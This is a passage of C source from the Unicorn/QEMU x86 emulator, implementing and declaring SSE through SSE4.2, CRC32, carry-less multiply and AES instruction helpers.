satsw((int16_t)s->W(4) - (int16_t)s->W(5))); XMM_ONLY(d->W(7) = satsw((int16_t)s->W(6) - (int16_t)s->W(7))); } #define FABSB(_, x) (x > INT8_MAX ? -(int8_t)x : x) #define FABSW(_, x) (x > INT16_MAX ? -(int16_t)x : x) #define FABSL(_, x) (x > INT32_MAX ? -(int32_t)x : x) SSE_HELPER_B(helper_pabsb, FABSB) SSE_HELPER_W(helper_pabsw, FABSW) SSE_HELPER_L(helper_pabsd, FABSL) #define FMULHRSW(d, s) (((int16_t) d * (int16_t)s + 0x4000) >> 15) SSE_HELPER_W(helper_pmulhrsw, FMULHRSW) #define FSIGNB(d, s) (s <= INT8_MAX ? s ? d : 0 : -(int8_t)d) #define FSIGNW(d, s) (s <= INT16_MAX ? s ? d : 0 : -(int16_t)d) #define FSIGNL(d, s) (s <= INT32_MAX ? s ? d : 0 : -(int32_t)d) SSE_HELPER_B(helper_psignb, FSIGNB) SSE_HELPER_W(helper_psignw, FSIGNW) SSE_HELPER_L(helper_psignd, FSIGNL) void glue(helper_palignr, SUFFIX)(CPUX86State *env, Reg *d, Reg *s, int32_t shift) { Reg r; /* XXX could be checked during translation */ if (shift >= (16 << SHIFT)) { r.Q(0) = 0; XMM_ONLY(r.Q(1) = 0); } else { shift <<= 3; #define SHR(v, i) (i < 64 && i > -64 ? i > 0 ? v >> (i) : (v << -(i)) : 0) #if SHIFT == 0 r.Q(0) = SHR(s->Q(0), shift - 0) | SHR(d->Q(0), shift - 64); #else r.Q(0) = SHR(s->Q(0), shift - 0) | SHR(s->Q(1), shift - 64) | SHR(d->Q(0), shift - 128) | SHR(d->Q(1), shift - 192); r.Q(1) = SHR(s->Q(0), shift + 64) | SHR(s->Q(1), shift - 0) | SHR(d->Q(0), shift - 64) | SHR(d->Q(1), shift - 128); #endif #undef SHR } *d = r; } #define XMM0 (env->xmm_regs[0]) #if SHIFT == 1 #define SSE_HELPER_V(name, elem, num, F) \ void glue(name, SUFFIX)(CPUX86State *env, Reg *d, Reg *s) \ { \ d->elem(0) = F(d->elem(0), s->elem(0), XMM0.elem(0)); \ d->elem(1) = F(d->elem(1), s->elem(1), XMM0.elem(1)); \ if (num > 2) { \ d->elem(2) = F(d->elem(2), s->elem(2), XMM0.elem(2)); \ d->elem(3) = F(d->elem(3), s->elem(3), XMM0.elem(3)); \ if (num > 4) { \ d->elem(4) = F(d->elem(4), s->elem(4), XMM0.elem(4)); \ d->elem(5) = F(d->elem(5), s->elem(5), XMM0.elem(5)); \ d->elem(6) = F(d->elem(6), s->elem(6), XMM0.elem(6)); \ d->elem(7) = F(d->elem(7), s->elem(7), XMM0.elem(7)); \ if (num > 8) { \ d->elem(8) = F(d->elem(8), s->elem(8), XMM0.elem(8)); \ d->elem(9) = F(d->elem(9), s->elem(9), XMM0.elem(9)); \ d->elem(10) = F(d->elem(10), s->elem(10), XMM0.elem(10)); \ d->elem(11) = F(d->elem(11), s->elem(11), XMM0.elem(11)); \ d->elem(12) = F(d->elem(12), s->elem(12), XMM0.elem(12)); \ d->elem(13) = F(d->elem(13), s->elem(13), XMM0.elem(13)); \ d->elem(14) = F(d->elem(14), s->elem(14), XMM0.elem(14)); \ d->elem(15) = F(d->elem(15), s->elem(15), XMM0.elem(15)); \ } \ } \ } \ } #define SSE_HELPER_I(name, elem, num, F) \ void glue(name, SUFFIX)(CPUX86State *env, Reg *d, Reg *s, uint32_t imm) \ { \ d->elem(0) = F(d->elem(0), s->elem(0), ((imm >> 0) & 1)); \ d->elem(1) = F(d->elem(1), s->elem(1), ((imm >> 1) & 1)); \ if (num > 2) { \ d->elem(2) = F(d->elem(2), s->elem(2), ((imm >> 2) & 1)); \ d->elem(3) = F(d->elem(3), s->elem(3), ((imm >> 3) & 1)); \ if (num > 4) { \ d->elem(4) = F(d->elem(4), s->elem(4), ((imm >> 4) & 1)); \ d->elem(5) = F(d->elem(5), s->elem(5), ((imm >> 5) & 1)); \ d->elem(6) = F(d->elem(6), s->elem(6), ((imm >> 6) & 1)); \ d->elem(7) = F(d->elem(7), s->elem(7), ((imm >> 7) & 1)); \ if (num > 8) { \ d->elem(8) = F(d->elem(8), s->elem(8), ((imm >> 8) & 1)); \ d->elem(9) = F(d->elem(9), s->elem(9), ((imm >> 9) & 1)); \ d->elem(10) = F(d->elem(10), s->elem(10), \ ((imm >> 10) & 1)); \ d->elem(11) = F(d->elem(11), s->elem(11), \ ((imm >> 11) & 1)); \ d->elem(12) = F(d->elem(12), s->elem(12), \ ((imm >> 12) & 1)); \ d->elem(13) = 
F(d->elem(13), s->elem(13), \ ((imm >> 13) & 1)); \ d->elem(14) = F(d->elem(14), s->elem(14), \ ((imm >> 14) & 1)); \ d->elem(15) = F(d->elem(15), s->elem(15), \ ((imm >> 15) & 1)); \ } \ } \ } \ } /* SSE4.1 op helpers */ #define FBLENDVB(d, s, m) ((m & 0x80) ? s : d) #define FBLENDVPS(d, s, m) ((m & 0x80000000) ? s : d) #define FBLENDVPD(d, s, m) ((m & 0x8000000000000000LL) ? s : d) SSE_HELPER_V(helper_pblendvb, B, 16, FBLENDVB) SSE_HELPER_V(helper_blendvps, L, 4, FBLENDVPS) SSE_HELPER_V(helper_blendvpd, Q, 2, FBLENDVPD) void glue(helper_ptest, SUFFIX)(CPUX86State *env, Reg *d, Reg *s) { uint64_t zf = (s->Q(0) & d->Q(0)) | (s->Q(1) & d->Q(1)); uint64_t cf = (s->Q(0) & ~d->Q(0)) | (s->Q(1) & ~d->Q(1)); CC_SRC = (zf ? 0 : CC_Z) | (cf ? 0 : CC_C); } #define SSE_HELPER_F(name, elem, num, F) \ void glue(name, SUFFIX)(CPUX86State *env, Reg *d, Reg *s) \ { \ if (num > 2) { \ if (num > 4) { \ d->elem(7) = F(7); \ d->elem(6) = F(6); \ d->elem(5) = F(5); \ d->elem(4) = F(4); \ } \ d->elem(3) = F(3); \ d->elem(2) = F(2); \ } \ d->elem(1) = F(1); \ d->elem(0) = F(0); \ } SSE_HELPER_F(helper_pmovsxbw, W, 8, (int8_t) s->B) SSE_HELPER_F(helper_pmovsxbd, L, 4, (int8_t) s->B) SSE_HELPER_F(helper_pmovsxbq, Q, 2, (int8_t) s->B) SSE_HELPER_F(helper_pmovsxwd, L, 4, (int16_t) s->W) SSE_HELPER_F(helper_pmovsxwq, Q, 2, (int16_t) s->W) SSE_HELPER_F(helper_pmovsxdq, Q, 2, (int32_t) s->L) SSE_HELPER_F(helper_pmovzxbw, W, 8, s->B) SSE_HELPER_F(helper_pmovzxbd, L, 4, s->B) SSE_HELPER_F(helper_pmovzxbq, Q, 2, s->B) SSE_HELPER_F(helper_pmovzxwd, L, 4, s->W) SSE_HELPER_F(helper_pmovzxwq, Q, 2, s->W) SSE_HELPER_F(helper_pmovzxdq, Q, 2, s->L) void glue(helper_pmuldq, SUFFIX)(CPUX86State *env, Reg *d, Reg *s) { d->Q(0) = (int64_t)(int32_t) d->L(0) * (int32_t) s->L(0); d->Q(1) = (int64_t)(int32_t) d->L(2) * (int32_t) s->L(2); } #define FCMPEQQ(d, s) (d == s ? 
-1 : 0) SSE_HELPER_Q(helper_pcmpeqq, FCMPEQQ) void glue(helper_packusdw, SUFFIX)(CPUX86State *env, Reg *d, Reg *s) { Reg r; r.W(0) = satuw((int32_t) d->L(0)); r.W(1) = satuw((int32_t) d->L(1)); r.W(2) = satuw((int32_t) d->L(2)); r.W(3) = satuw((int32_t) d->L(3)); r.W(4) = satuw((int32_t) s->L(0)); r.W(5) = satuw((int32_t) s->L(1)); r.W(6) = satuw((int32_t) s->L(2)); r.W(7) = satuw((int32_t) s->L(3)); *d = r; } #define FMINSB(d, s) MIN((int8_t)d, (int8_t)s) #define FMINSD(d, s) MIN((int32_t)d, (int32_t)s) #define FMAXSB(d, s) MAX((int8_t)d, (int8_t)s) #define FMAXSD(d, s) MAX((int32_t)d, (int32_t)s) SSE_HELPER_B(helper_pminsb, FMINSB) SSE_HELPER_L(helper_pminsd, FMINSD) SSE_HELPER_W(helper_pminuw, MIN) SSE_HELPER_L(helper_pminud, MIN) SSE_HELPER_B(helper_pmaxsb, FMAXSB) SSE_HELPER_L(helper_pmaxsd, FMAXSD) SSE_HELPER_W(helper_pmaxuw, MAX) SSE_HELPER_L(helper_pmaxud, MAX) #define FMULLD(d, s) ((int32_t)d * (int32_t)s) SSE_HELPER_L(helper_pmulld, FMULLD) void glue(helper_phminposuw, SUFFIX)(CPUX86State *env, Reg *d, Reg *s) { int idx = 0; if (s->W(1) < s->W(idx)) { idx = 1; } if (s->W(2) < s->W(idx)) { idx = 2; } if (s->W(3) < s->W(idx)) { idx = 3; } if (s->W(4) < s->W(idx)) { idx = 4; } if (s->W(5) < s->W(idx)) { idx = 5; } if (s->W(6) < s->W(idx)) { idx = 6; } if (s->W(7) < s->W(idx)) { idx = 7; } d->W(0) = s->W(idx); d->W(1) = idx; d->L(1) = 0; d->Q(1) = 0; } void glue(helper_roundps, SUFFIX)(CPUX86State *env, Reg *d, Reg *s, uint32_t mode) { signed char prev_rounding_mode; prev_rounding_mode = env->sse_status.float_rounding_mode; if (!(mode & (1 << 2))) { switch (mode & 3) { case 0: set_float_rounding_mode(float_round_nearest_even, &env->sse_status); break; case 1: set_float_rounding_mode(float_round_down, &env->sse_status); break; case 2: set_float_rounding_mode(float_round_up, &env->sse_status); break; case 3: set_float_rounding_mode(float_round_to_zero, &env->sse_status); break; } } d->ZMM_S(0) = float32_round_to_int(s->ZMM_S(0), &env->sse_status); d->ZMM_S(1) = float32_round_to_int(s->ZMM_S(1), &env->sse_status); d->ZMM_S(2) = float32_round_to_int(s->ZMM_S(2), &env->sse_status); d->ZMM_S(3) = float32_round_to_int(s->ZMM_S(3), &env->sse_status); #if 0 /* TODO */ if (mode & (1 << 3)) { set_float_exception_flags(get_float_exception_flags(&env->sse_status) & ~float_flag_inexact, &env->sse_status); } #endif env->sse_status.float_rounding_mode = prev_rounding_mode; } void glue(helper_roundpd, SUFFIX)(CPUX86State *env, Reg *d, Reg *s, uint32_t mode) { signed char prev_rounding_mode; prev_rounding_mode = env->sse_status.float_rounding_mode; if (!(mode & (1 << 2))) { switch (mode & 3) { case 0: set_float_rounding_mode(float_round_nearest_even, &env->sse_status); break; case 1: set_float_rounding_mode(float_round_down, &env->sse_status); break; case 2: set_float_rounding_mode(float_round_up, &env->sse_status); break; case 3: set_float_rounding_mode(float_round_to_zero, &env->sse_status); break; } } d->ZMM_D(0) = float64_round_to_int(s->ZMM_D(0), &env->sse_status); d->ZMM_D(1) = float64_round_to_int(s->ZMM_D(1), &env->sse_status); #if 0 /* TODO */ if (mode & (1 << 3)) { set_float_exception_flags(get_float_exception_flags(&env->sse_status) & ~float_flag_inexact, &env->sse_status); } #endif env->sse_status.float_rounding_mode = prev_rounding_mode; } void glue(helper_roundss, SUFFIX)(CPUX86State *env, Reg *d, Reg *s, uint32_t mode) { signed char prev_rounding_mode; prev_rounding_mode = env->sse_status.float_rounding_mode; if (!(mode & (1 << 2))) { switch (mode & 3) { case 0: 
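        /*
         * Editorial note (added): in the round{ps,pd,ss,sd} immediate,
         * bit 2 set selects the rounding mode already in MXCSR (hence the
         * !(mode & (1 << 2)) guard above), while bits 1:0 encode
         * nearest-even, down, up or truncate -- the four cases of this
         * switch.
         */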
set_float_rounding_mode(float_round_nearest_even, &env->sse_status); break; case 1: set_float_rounding_mode(float_round_down, &env->sse_status); break; case 2: set_float_rounding_mode(float_round_up, &env->sse_status); break; case 3: set_float_rounding_mode(float_round_to_zero, &env->sse_status); break; } } d->ZMM_S(0) = float32_round_to_int(s->ZMM_S(0), &env->sse_status); #if 0 /* TODO */ if (mode & (1 << 3)) { set_float_exception_flags(get_float_exception_flags(&env->sse_status) & ~float_flag_inexact, &env->sse_status); } #endif env->sse_status.float_rounding_mode = prev_rounding_mode; } void glue(helper_roundsd, SUFFIX)(CPUX86State *env, Reg *d, Reg *s, uint32_t mode) { signed char prev_rounding_mode; prev_rounding_mode = env->sse_status.float_rounding_mode; if (!(mode & (1 << 2))) { switch (mode & 3) { case 0: set_float_rounding_mode(float_round_nearest_even, &env->sse_status); break; case 1: set_float_rounding_mode(float_round_down, &env->sse_status); break; case 2: set_float_rounding_mode(float_round_up, &env->sse_status); break; case 3: set_float_rounding_mode(float_round_to_zero, &env->sse_status); break; } } d->ZMM_D(0) = float64_round_to_int(s->ZMM_D(0), &env->sse_status); #if 0 /* TODO */ if (mode & (1 << 3)) { set_float_exception_flags(get_float_exception_flags(&env->sse_status) & ~float_flag_inexact, &env->sse_status); } #endif env->sse_status.float_rounding_mode = prev_rounding_mode; } #define FBLENDP(d, s, m) (m ? s : d) SSE_HELPER_I(helper_blendps, L, 4, FBLENDP) SSE_HELPER_I(helper_blendpd, Q, 2, FBLENDP) SSE_HELPER_I(helper_pblendw, W, 8, FBLENDP) void glue(helper_dpps, SUFFIX)(CPUX86State *env, Reg *d, Reg *s, uint32_t mask) { float32 iresult = float32_zero; if (mask & (1 << 4)) { iresult = float32_add(iresult, float32_mul(d->ZMM_S(0), s->ZMM_S(0), &env->sse_status), &env->sse_status); } if (mask & (1 << 5)) { iresult = float32_add(iresult, float32_mul(d->ZMM_S(1), s->ZMM_S(1), &env->sse_status), &env->sse_status); } if (mask & (1 << 6)) { iresult = float32_add(iresult, float32_mul(d->ZMM_S(2), s->ZMM_S(2), &env->sse_status), &env->sse_status); } if (mask & (1 << 7)) { iresult = float32_add(iresult, float32_mul(d->ZMM_S(3), s->ZMM_S(3), &env->sse_status), &env->sse_status); } d->ZMM_S(0) = (mask & (1 << 0)) ? iresult : float32_zero; d->ZMM_S(1) = (mask & (1 << 1)) ? iresult : float32_zero; d->ZMM_S(2) = (mask & (1 << 2)) ? iresult : float32_zero; d->ZMM_S(3) = (mask & (1 << 3)) ? iresult : float32_zero; } void glue(helper_dppd, SUFFIX)(CPUX86State *env, Reg *d, Reg *s, uint32_t mask) { float64 iresult = float64_zero; if (mask & (1 << 4)) { iresult = float64_add(iresult, float64_mul(d->ZMM_D(0), s->ZMM_D(0), &env->sse_status), &env->sse_status); } if (mask & (1 << 5)) { iresult = float64_add(iresult, float64_mul(d->ZMM_D(1), s->ZMM_D(1), &env->sse_status), &env->sse_status); } d->ZMM_D(0) = (mask & (1 << 0)) ? iresult : float64_zero; d->ZMM_D(1) = (mask & (1 << 1)) ? iresult : float64_zero; } void glue(helper_mpsadbw, SUFFIX)(CPUX86State *env, Reg *d, Reg *s, uint32_t offset) { int s0 = (offset & 3) << 2; int d0 = (offset & 4) << 0; int i; Reg r; for (i = 0; i < 8; i++, d0++) { r.W(i) = 0; r.W(i) += abs1(d->B(d0 + 0) - s->B(s0 + 0)); r.W(i) += abs1(d->B(d0 + 1) - s->B(s0 + 1)); r.W(i) += abs1(d->B(d0 + 2) - s->B(s0 + 2)); r.W(i) += abs1(d->B(d0 + 3) - s->B(s0 + 3)); } *d = r; } /* SSE4.2 op helpers */ #define FCMPGTQ(d, s) ((int64_t)d > (int64_t)s ? 
-1 : 0) SSE_HELPER_Q(helper_pcmpgtq, FCMPGTQ) static inline int pcmp_elen(CPUX86State *env, int reg, uint32_t ctrl) { int val; /* Presence of REX.W is indicated by a bit higher than 7 set */ if (ctrl >> 8) { val = abs1((int64_t)env->regs[reg]); } else { val = abs1((int32_t)env->regs[reg]); } if (ctrl & 1) { if (val > 8) { return 8; } } else { if (val > 16) { return 16; } } return val; } static inline int pcmp_ilen(Reg *r, uint8_t ctrl) { int val = 0; if (ctrl & 1) { while (val < 8 && r->W(val)) { val++; } } else { while (val < 16 && r->B(val)) { val++; } } return val; } static inline int pcmp_val(Reg *r, uint8_t ctrl, int i) { switch ((ctrl >> 0) & 3) { case 0: return r->B(i); case 1: return r->W(i); case 2: return (int8_t)r->B(i); case 3: default: return (int16_t)r->W(i); } } static inline unsigned pcmpxstrx(CPUX86State *env, Reg *d, Reg *s, int8_t ctrl, int valids, int validd) { unsigned int res = 0; int v; int j, i; int upper = (ctrl & 1) ? 7 : 15; valids--; validd--; CC_SRC = (valids < upper ? CC_Z : 0) | (validd < upper ? CC_S : 0); switch ((ctrl >> 2) & 3) { case 0: for (j = valids; j >= 0; j--) { res <<= 1; v = pcmp_val(s, ctrl, j); for (i = validd; i >= 0; i--) { res |= (v == pcmp_val(d, ctrl, i)); } } break; case 1: for (j = valids; j >= 0; j--) { res <<= 1; v = pcmp_val(s, ctrl, j); for (i = ((validd - 1) | 1); i >= 0; i -= 2) { res |= (pcmp_val(d, ctrl, i - 0) >= v && pcmp_val(d, ctrl, i - 1) <= v); } } break; case 2: res = (1 << (upper - MAX(valids, validd))) - 1; res <<= MAX(valids, validd) - MIN(valids, validd); for (i = MIN(valids, validd); i >= 0; i--) { res <<= 1; v = pcmp_val(s, ctrl, i); res |= (v == pcmp_val(d, ctrl, i)); } break; case 3: if (validd == -1) { res = (2 << upper) - 1; break; } for (j = valids - validd; j >= 0; j--) { res <<= 1; v = 1; for (i = validd; i >= 0; i--) { v &= (pcmp_val(s, ctrl, i + j) == pcmp_val(d, ctrl, i)); } res |= v; } break; } switch ((ctrl >> 4) & 3) { case 1: res ^= (2 << upper) - 1; break; case 3: res ^= (1 << (valids + 1)) - 1; break; } if (res) { CC_SRC |= CC_C; } if (res & 1) { CC_SRC |= CC_O; } return res; } void glue(helper_pcmpestri, SUFFIX)(CPUX86State *env, Reg *d, Reg *s, uint32_t ctrl) { unsigned int res = pcmpxstrx(env, d, s, ctrl, pcmp_elen(env, R_EDX, ctrl), pcmp_elen(env, R_EAX, ctrl)); if (res) { env->regs[R_ECX] = (ctrl & (1 << 6)) ? 31 - clz32(res) : ctz32(res); } else { env->regs[R_ECX] = 16 >> (ctrl & (1 << 0)); } } void glue(helper_pcmpestrm, SUFFIX)(CPUX86State *env, Reg *d, Reg *s, uint32_t ctrl) { int i; unsigned int res = pcmpxstrx(env, d, s, ctrl, pcmp_elen(env, R_EDX, ctrl), pcmp_elen(env, R_EAX, ctrl)); if ((ctrl >> 6) & 1) { if (ctrl & 1) { for (i = 0; i < 8; i++, res >>= 1) { env->xmm_regs[0].W(i) = (res & 1) ? ~0 : 0; } } else { for (i = 0; i < 16; i++, res >>= 1) { env->xmm_regs[0].B(i) = (res & 1) ? ~0 : 0; } } } else { env->xmm_regs[0].Q(1) = 0; env->xmm_regs[0].Q(0) = res; } } void glue(helper_pcmpistri, SUFFIX)(CPUX86State *env, Reg *d, Reg *s, uint32_t ctrl) { unsigned int res = pcmpxstrx(env, d, s, ctrl, pcmp_ilen(s, ctrl), pcmp_ilen(d, ctrl)); if (res) { env->regs[R_ECX] = (ctrl & (1 << 6)) ? 31 - clz32(res) : ctz32(res); } else { env->regs[R_ECX] = 16 >> (ctrl & (1 << 0)); } } void glue(helper_pcmpistrm, SUFFIX)(CPUX86State *env, Reg *d, Reg *s, uint32_t ctrl) { int i; unsigned int res = pcmpxstrx(env, d, s, ctrl, pcmp_ilen(s, ctrl), pcmp_ilen(d, ctrl)); if ((ctrl >> 6) & 1) { if (ctrl & 1) { for (i = 0; i < 8; i++, res >>= 1) { env->xmm_regs[0].W(i) = (res & 1) ? 
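/* ctrl bit 6 selected the "expanded" mask form: each result bit is
 * widened to a full ~0/0 element in XMM0; with bit 6 clear, the raw
 * bit mask is simply zero-extended into XMM0.Q(0) below. */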
~0 : 0; } } else { for (i = 0; i < 16; i++, res >>= 1) { env->xmm_regs[0].B(i) = (res & 1) ? ~0 : 0; } } } else { env->xmm_regs[0].Q(1) = 0; env->xmm_regs[0].Q(0) = res; } } #define CRCPOLY 0x1edc6f41 #define CRCPOLY_BITREV 0x82f63b78 target_ulong helper_crc32(uint32_t crc1, target_ulong msg, uint32_t len) { target_ulong crc = (msg & ((target_ulong) -1 >> (TARGET_LONG_BITS - len))) ^ crc1; while (len--) { crc = (crc >> 1) ^ ((crc & 1) ? CRCPOLY_BITREV : 0); } return crc; } void glue(helper_pclmulqdq, SUFFIX)(CPUX86State *env, Reg *d, Reg *s, uint32_t ctrl) { uint64_t ah, al, b, resh, resl; ah = 0; al = d->Q((ctrl & 1) != 0); b = s->Q((ctrl & 16) != 0); resh = resl = 0; while (b) { if (b & 1) { resl ^= al; resh ^= ah; } ah = (ah << 1) | (al >> 63); al <<= 1; b >>= 1; } d->Q(0) = resl; d->Q(1) = resh; } void glue(helper_aesdec, SUFFIX)(CPUX86State *env, Reg *d, Reg *s) { int i; Reg st = *d; Reg rk = *s; for (i = 0 ; i < 4 ; i++) { d->L(i) = rk.L(i) ^ bswap32(AES_Td0[st.B(AES_ishifts[4*i+0])] ^ AES_Td1[st.B(AES_ishifts[4*i+1])] ^ AES_Td2[st.B(AES_ishifts[4*i+2])] ^ AES_Td3[st.B(AES_ishifts[4*i+3])]); } } void glue(helper_aesdeclast, SUFFIX)(CPUX86State *env, Reg *d, Reg *s) { int i; Reg st = *d; Reg rk = *s; for (i = 0; i < 16; i++) { d->B(i) = rk.B(i) ^ (AES_isbox[st.B(AES_ishifts[i])]); } } void glue(helper_aesenc, SUFFIX)(CPUX86State *env, Reg *d, Reg *s) { int i; Reg st = *d; Reg rk = *s; for (i = 0 ; i < 4 ; i++) { d->L(i) = rk.L(i) ^ bswap32(AES_Te0[st.B(AES_shifts[4*i+0])] ^ AES_Te1[st.B(AES_shifts[4*i+1])] ^ AES_Te2[st.B(AES_shifts[4*i+2])] ^ AES_Te3[st.B(AES_shifts[4*i+3])]); } } void glue(helper_aesenclast, SUFFIX)(CPUX86State *env, Reg *d, Reg *s) { int i; Reg st = *d; Reg rk = *s; for (i = 0; i < 16; i++) { d->B(i) = rk.B(i) ^ (AES_sbox[st.B(AES_shifts[i])]); } } void glue(helper_aesimc, SUFFIX)(CPUX86State *env, Reg *d, Reg *s) { int i; Reg tmp = *s; for (i = 0 ; i < 4 ; i++) { d->L(i) = bswap32(AES_imc[tmp.B(4*i+0)][0] ^ AES_imc[tmp.B(4*i+1)][1] ^ AES_imc[tmp.B(4*i+2)][2] ^ AES_imc[tmp.B(4*i+3)][3]); } } void glue(helper_aeskeygenassist, SUFFIX)(CPUX86State *env, Reg *d, Reg *s, uint32_t ctrl) { int i; Reg tmp = *s; for (i = 0 ; i < 4 ; i++) { d->B(i) = AES_sbox[tmp.B(i + 4)]; d->B(i + 8) = AES_sbox[tmp.B(i + 12)]; } d->L(1) = (d->L(0) << 24 | d->L(0) >> 8) ^ ctrl; d->L(3) = (d->L(2) << 24 | d->L(2) >> 8) ^ ctrl; } #endif #undef SHIFT #undef XMM_ONLY #undef Reg #undef B #undef W #undef L #undef Q #undef SUFFIX
unicorn-2.1.1/qemu/target/i386/ops_sse_header.h
/* * MMX/3DNow!/SSE/SSE2/SSE3/SSSE3/SSE4/PNI support * * Copyright (c) 2005 Fabrice Bellard * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU
Lesser General Public * License as published by the Free Software Foundation; either * version 2 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ #if SHIFT == 0 #define Reg MMXReg #define SUFFIX _mmx #else #define Reg ZMMReg #define SUFFIX _xmm #endif #define dh_alias_Reg ptr #define dh_alias_ZMMReg ptr #define dh_alias_MMXReg ptr #define dh_ctype_Reg Reg * #define dh_ctype_ZMMReg ZMMReg * #define dh_ctype_MMXReg MMXReg * #define dh_is_signed_Reg dh_is_signed_ptr #define dh_is_signed_ZMMReg dh_is_signed_ptr #define dh_is_signed_MMXReg dh_is_signed_ptr DEF_HELPER_3(glue(psrlw, SUFFIX), void, env, Reg, Reg) DEF_HELPER_3(glue(psraw, SUFFIX), void, env, Reg, Reg) DEF_HELPER_3(glue(psllw, SUFFIX), void, env, Reg, Reg) DEF_HELPER_3(glue(psrld, SUFFIX), void, env, Reg, Reg) DEF_HELPER_3(glue(psrad, SUFFIX), void, env, Reg, Reg) DEF_HELPER_3(glue(pslld, SUFFIX), void, env, Reg, Reg) DEF_HELPER_3(glue(psrlq, SUFFIX), void, env, Reg, Reg) DEF_HELPER_3(glue(psllq, SUFFIX), void, env, Reg, Reg) #if SHIFT == 1 DEF_HELPER_3(glue(psrldq, SUFFIX), void, env, Reg, Reg) DEF_HELPER_3(glue(pslldq, SUFFIX), void, env, Reg, Reg) #endif #define SSE_HELPER_B(name, F)\ DEF_HELPER_3(glue(name, SUFFIX), void, env, Reg, Reg) #define SSE_HELPER_W(name, F)\ DEF_HELPER_3(glue(name, SUFFIX), void, env, Reg, Reg) #define SSE_HELPER_L(name, F)\ DEF_HELPER_3(glue(name, SUFFIX), void, env, Reg, Reg) #define SSE_HELPER_Q(name, F)\ DEF_HELPER_3(glue(name, SUFFIX), void, env, Reg, Reg) SSE_HELPER_B(paddb, FADD) SSE_HELPER_W(paddw, FADD) SSE_HELPER_L(paddl, FADD) SSE_HELPER_Q(paddq, FADD) SSE_HELPER_B(psubb, FSUB) SSE_HELPER_W(psubw, FSUB) SSE_HELPER_L(psubl, FSUB) SSE_HELPER_Q(psubq, FSUB) SSE_HELPER_B(paddusb, FADDUB) SSE_HELPER_B(paddsb, FADDSB) SSE_HELPER_B(psubusb, FSUBUB) SSE_HELPER_B(psubsb, FSUBSB) SSE_HELPER_W(paddusw, FADDUW) SSE_HELPER_W(paddsw, FADDSW) SSE_HELPER_W(psubusw, FSUBUW) SSE_HELPER_W(psubsw, FSUBSW) SSE_HELPER_B(pminub, FMINUB) SSE_HELPER_B(pmaxub, FMAXUB) SSE_HELPER_W(pminsw, FMINSW) SSE_HELPER_W(pmaxsw, FMAXSW) SSE_HELPER_Q(pand, FAND) SSE_HELPER_Q(pandn, FANDN) SSE_HELPER_Q(por, FOR) SSE_HELPER_Q(pxor, FXOR) SSE_HELPER_B(pcmpgtb, FCMPGTB) SSE_HELPER_W(pcmpgtw, FCMPGTW) SSE_HELPER_L(pcmpgtl, FCMPGTL) SSE_HELPER_B(pcmpeqb, FCMPEQ) SSE_HELPER_W(pcmpeqw, FCMPEQ) SSE_HELPER_L(pcmpeql, FCMPEQ) SSE_HELPER_W(pmullw, FMULLW) #if SHIFT == 0 SSE_HELPER_W(pmulhrw, FMULHRW) #endif SSE_HELPER_W(pmulhuw, FMULHUW) SSE_HELPER_W(pmulhw, FMULHW) SSE_HELPER_B(pavgb, FAVG) SSE_HELPER_W(pavgw, FAVG) DEF_HELPER_3(glue(pmuludq, SUFFIX), void, env, Reg, Reg) DEF_HELPER_3(glue(pmaddwd, SUFFIX), void, env, Reg, Reg) DEF_HELPER_3(glue(psadbw, SUFFIX), void, env, Reg, Reg) DEF_HELPER_4(glue(maskmov, SUFFIX), void, env, Reg, Reg, tl) DEF_HELPER_2(glue(movl_mm_T0, SUFFIX), void, Reg, i32) #ifdef TARGET_X86_64 DEF_HELPER_2(glue(movq_mm_T0, SUFFIX), void, Reg, i64) #endif #if SHIFT == 0 DEF_HELPER_3(glue(pshufw, SUFFIX), void, Reg, Reg, int) #else DEF_HELPER_3(shufps, void, Reg, Reg, int) DEF_HELPER_3(shufpd, void, Reg, Reg, int) DEF_HELPER_3(glue(pshufd, SUFFIX), void, Reg, Reg, int) DEF_HELPER_3(glue(pshuflw, SUFFIX), void, Reg, Reg, 
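/* In these DEF_HELPER_n(name, ret, t1, ...) declarations the first
 * type is the return type and the rest are argument types: "env" is
 * the CPUX86State pointer, "Reg" an MMX/ZMM register pointer (routed
 * through the dh_alias_*/dh_ctype_* definitions above), "tl" a
 * target_ulong, and i32/s32/i64/s64 fixed-width (un)signed integers. */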
int) DEF_HELPER_3(glue(pshufhw, SUFFIX), void, Reg, Reg, int) #endif #if SHIFT == 1 /* FPU ops */ /* XXX: not accurate */ #define SSE_HELPER_S(name, F) \ DEF_HELPER_3(name ## ps, void, env, Reg, Reg) \ DEF_HELPER_3(name ## ss, void, env, Reg, Reg) \ DEF_HELPER_3(name ## pd, void, env, Reg, Reg) \ DEF_HELPER_3(name ## sd, void, env, Reg, Reg) SSE_HELPER_S(add, FPU_ADD) SSE_HELPER_S(sub, FPU_SUB) SSE_HELPER_S(mul, FPU_MUL) SSE_HELPER_S(div, FPU_DIV) SSE_HELPER_S(min, FPU_MIN) SSE_HELPER_S(max, FPU_MAX) SSE_HELPER_S(sqrt, FPU_SQRT) DEF_HELPER_3(cvtps2pd, void, env, Reg, Reg) DEF_HELPER_3(cvtpd2ps, void, env, Reg, Reg) DEF_HELPER_3(cvtss2sd, void, env, Reg, Reg) DEF_HELPER_3(cvtsd2ss, void, env, Reg, Reg) DEF_HELPER_3(cvtdq2ps, void, env, Reg, Reg) DEF_HELPER_3(cvtdq2pd, void, env, Reg, Reg) DEF_HELPER_3(cvtpi2ps, void, env, ZMMReg, MMXReg) DEF_HELPER_3(cvtpi2pd, void, env, ZMMReg, MMXReg) DEF_HELPER_3(cvtsi2ss, void, env, ZMMReg, i32) DEF_HELPER_3(cvtsi2sd, void, env, ZMMReg, i32) #ifdef TARGET_X86_64 DEF_HELPER_3(cvtsq2ss, void, env, ZMMReg, i64) DEF_HELPER_3(cvtsq2sd, void, env, ZMMReg, i64) #endif DEF_HELPER_3(cvtps2dq, void, env, ZMMReg, ZMMReg) DEF_HELPER_3(cvtpd2dq, void, env, ZMMReg, ZMMReg) DEF_HELPER_3(cvtps2pi, void, env, MMXReg, ZMMReg) DEF_HELPER_3(cvtpd2pi, void, env, MMXReg, ZMMReg) DEF_HELPER_2(cvtss2si, s32, env, ZMMReg) DEF_HELPER_2(cvtsd2si, s32, env, ZMMReg) #ifdef TARGET_X86_64 